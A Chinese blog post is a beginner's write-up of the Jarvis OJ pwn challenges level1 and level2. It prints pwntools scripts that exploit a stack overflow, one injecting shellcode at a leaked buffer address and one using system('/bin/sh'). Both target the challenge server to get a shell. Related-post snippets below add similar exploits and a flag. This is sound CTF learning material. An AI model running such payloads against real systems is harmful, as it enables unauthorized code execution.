oj level1-2

最新推荐文章于 2022-03-01 17:23:11 发布
最新推荐文章于 2022-03-01 17:23:11 发布
阅读量286 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43600412/article/details/97163521
版权

今天学习了pwn三道简单题,发现一个规律,pwn题都绕不开写脚本,脚本主要内容根据情况而定,记录如下
文件直接用编辑器打开是看不到内容的,是一堆16进制代码,只能直接放进ida中查看。
level1:ida打开进入main函数的伪代码,具体操作不再累述:
在这里插入图片描述上图可看出主函数由 vulnerable_function()和write()函数组成,点开vulnerable_function()函数,可以看到其中的printf()函数有变量“&buf”,这是关键,上面有关于buf的注释:表示从栈低只buf的栈空间为0X00至0X88,可看做栈的大小,附栈表示图:
在这里插入图片描述在这里插入图片描述

附栈表示图:
而return函数有一变量为0x100u,很明显,溢出了,但是我这次没有找到system函数和bin/sh字符串了,但是发现了printf,输出了buf的地址,在结合NX保护是关闭的,那么就意味着,如果将shellcode写到buf中,函数返回时跳转到buf位置,就可以执行shellcode了,示意图如下:
在这里插入图片描述
写得脚本 。(目前还不会写脚本,借的代码…)

from pwn import *




context(arch='i386',os='linux')
#p=process("./level1")
p=remote("pwn2.jarvisoj.com",9877)

p.recvuntil("this:")
stack_addr=int(p.recv(10),16)
p.recvline()
print hex(stack_addr)
payload=asm(shellcraft.sh()).ljust(0x88)+"A"*4+p32(stack_addr)
p.sendline(payload)
p.interactive()

将脚本在ubuntu虚拟机中运行:最后 cat flag
level2:
首先用checksec查一下保护。NX开启了。
整体思路与level0差不多,但是还是有一点区别:我们需要模拟call system函数的过程,在这个过程中call有一步是将下一条指令的地址压栈,所以我们需要构造一个假的返回地址,当然这个内容随意。写得脚本如下。:

  from pwn import *
  conn=remote("pwn2.jarvisoj.com","9878")
  e=ELF("./level2")
  sys_addr=e.symbols['system']
  pad=0x88
  sh_addr=e.search("/bin/sh").next()
  payload="A"*pad+"BBBB"+p32(sys_addr)+"dead"+p32(sh_addr    )
  conn.sendline(payload)
  conn.interactive();

运行脚本得到答案

沙窝李
关注
oj level2_x64 简单栈溢出(64)
weixin_44954083的博客
07-12 316
一开始就看一下这道题的保护机制和位数 由于NX是保护的,所以栈上的数据没有执行权限 防止攻击手段:栈溢出 + 跳到栈上执行shellcode 因为这道题是64位的,不是32位,32位和64位的主要区别在于函数参数传递的方式, 32位程序函数的参数是压在栈中的,而64位程序的前6个参数是存在寄存器中的,第7个开始才压入栈中。就是前6个是从左到右,多于6个的时候时,就是从右到左压入堆栈, 64位主要...
Jarvis OJ--level3
Kni9hT's Blog
11-10 290
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
Jarvis OJ - level2
weixin_43464124的博客
05-17 266
这一题根上一题有很多相似的地方 而且比上一道还简单了不少 因为其给出了/bin/sh字符串 所以就不细说了 主要是因为exp比较有意思 学到了一些东西 所以想记录下来 from pwn import* p = remote("pwn2.jarvisoj.com","9878") elf = ELF("./level2") sys_addr = elf.symbols["system"] bin_a...
jarvisoj-level2
qq_35661990的博客
11-09 1426
只开了NX,栈上不可执行 main函数 vulnerable_function(); system("echo 'Hello World!'"); return 0; function函数 char buf; // [esp+0h] [ebp-88h] system("echo Input:"); return read(0, &buf, 0x10...
JarvisOJ-PWN-Level2
杀生丸?不,其实我要的是桔梗
03-22 726
JarvisOJ-PWN-Level2 IDA打开,稍微分析下发现其和level1大致一样,都是利用read栈溢出。 shift+12查看字符串 看到/bin/sh 双击得到地址: 再看到这个: 那么就是要传参数到system()里了。 所以构造代码如下: # -*- coding:utf-8 -*- from pwn import * # sh = proce...
JarvisOJ-PWN-Level1
杀生丸?不,其实我要的是桔梗
03-16 915
JarvisOJ-PWN-Level 先checksec一下: 发现NX栈保护没有打开,也就是堆栈代码没有进行保护,那么就就题目很可能就是要输入shellcode在栈里执行吧。 打开IDA分析(32位): 主函数: vulner..fuction()函数: 题目的逻辑是打出buf的首地址然后写入从标准输入100字节给buf。 然后输出Holle world。 我们再看b...
leetcode和oj-C-Coding:C++源代码
06-30
2 big int 超长整数相加 3 link 将两个线性表合并成为一个线性表 4 edit 字符串操作 5 二哥摘苹果 6 二哥种花生 7 二哥养细菌 8 西西弗斯式的命运 9 排序 10 Ackerman函数 11 ackerman 12 pascal 13 ferry 14 isCBT ...
pwn学习-jarvisoj-level4-无libc的漏洞利用
qq_45653588的博客
12-20 345
这题下载文件下来,文件与level3反编译后伪代码基本一样,只是相比level3少了一个libc文件。level3 vulnerable_function()中存在明显的栈溢出,分配了0x88的空间,能输入0x100的内容。 ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] return read(0, &buf, 0x100u); } 同样以payload payload = 'a' * 0x8c + p32
Jarvis OJ --level4
Kni9hT's Blog
11-11 302
level4与level12、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
在线OJ系统--第二章(业务层编写)
zSoaring的博客
03-01 1174
主要是将后端逻辑完善
jarvis oj level1
发蝴蝶和大脑斧的博客
12-01 398
还是先checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 发现数据部分可以执行,先看ida,同样是vulnerable处有栈溢...
jarvisoj pwn level1 ——记第一次shellcode的编写
Vccxx的博客
03-19 3716
jarvisoj(https://www.jarvisoj.com/challenges )pwn部分 level1 解题过程:在队友的指导下写了人生第一个shellcode感觉很刺激,过程中还是学到了很多东西,记录一下这个程序流程很简单,用ida分析就两个主要的函数:main:int __cdecl main(int argc, const char **argv, const char **en
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 4702
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
C语言程序设计基础OJ练习题(实验八指针)
Gyp郭小帅的博客
01-17 2763
为了正确地访问这些内存单元, 必须为每个内存单元编上号。 根据一个内存单元的编号即可准确地找到该内存单元。内存单元的编号也叫做地址。 既然根据内存单元的编号或地址就可以找到所需的内存单元,所以通常也把这个地址称为指针。 内存单元的指针和内存单元的内容是两个不同的概念。 可以用一个通俗的例子来说明它们之间的关系。我们到银行去存取款时, 银行工作人员将根据我们的帐号去找我们的存款单, 找...
Jarvis OJ level1
九层台
07-06 825
liu@liu-F117-F:~/桌面/oj/level1$ checksec level1 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level1/level1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: ...
Jarvis OJ [XMAN]level2(x64)
九层台
07-07 1189
liu@liu-F117-F:~/桌面/oj/level2_x64$ checksec level2_x64 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level2_x64/level2_x64' Arch: amd64-64-little RELRO: No RELRO Stack: No canary fo...
(Jarvis Oj)(Pwn) level1
Nothing
04-18 1342
(Jarvis Oj)(Pwn) level1 首先用checksec查一下保护。几乎没开什么保护措施。关键的是NX没开,意味着栈上的数据可执行。 用ida反汇编,找到溢出点。 但这次没有找到system函数了,那么该怎么得到shell呢,发现这个函数调用了printf函数,输出了buf的地址,在结合NX保护是关闭的,那么就意味着,如果将shellcode写到buf中,函数返回时跳转...
jarvis oj---level1解题方法
weixin_45427676的博客
09-29 531
题目场景 nc pwn2.jarvisoj.com 9877 level1.80eacdcd51aca92af7749d96efad7fb5 解题 在vm终端“checksec"查看一下保护机制 没有什么保护,用IDA打开文件 查看vulnerable_function()函数 可以看到栈溢出 我们没有看到system()函数,没有找到"/bin/sh",但是在vulnerable_funct...
pwn level1level2
qq_43613772的博客
07-24 1060
下载文件之后马上查一下保护,NX为打开状态,NX为文件保护的一种方式。 用IDA打开进行反汇编,找溢出点。 看到很显眼的system后,于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,记下地址。 逻辑示意图: 注意不能在vulnerabl...
jarvisoj_level1
最新发布
08-28
很抱歉,我无法回答这个问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.youkuaiyun.com/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [个人网站大总结合集—持续更新,欢迎共享,不要白嫖哦](https://download.youkuaiyun.com/download/weixin_38708461/14885161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值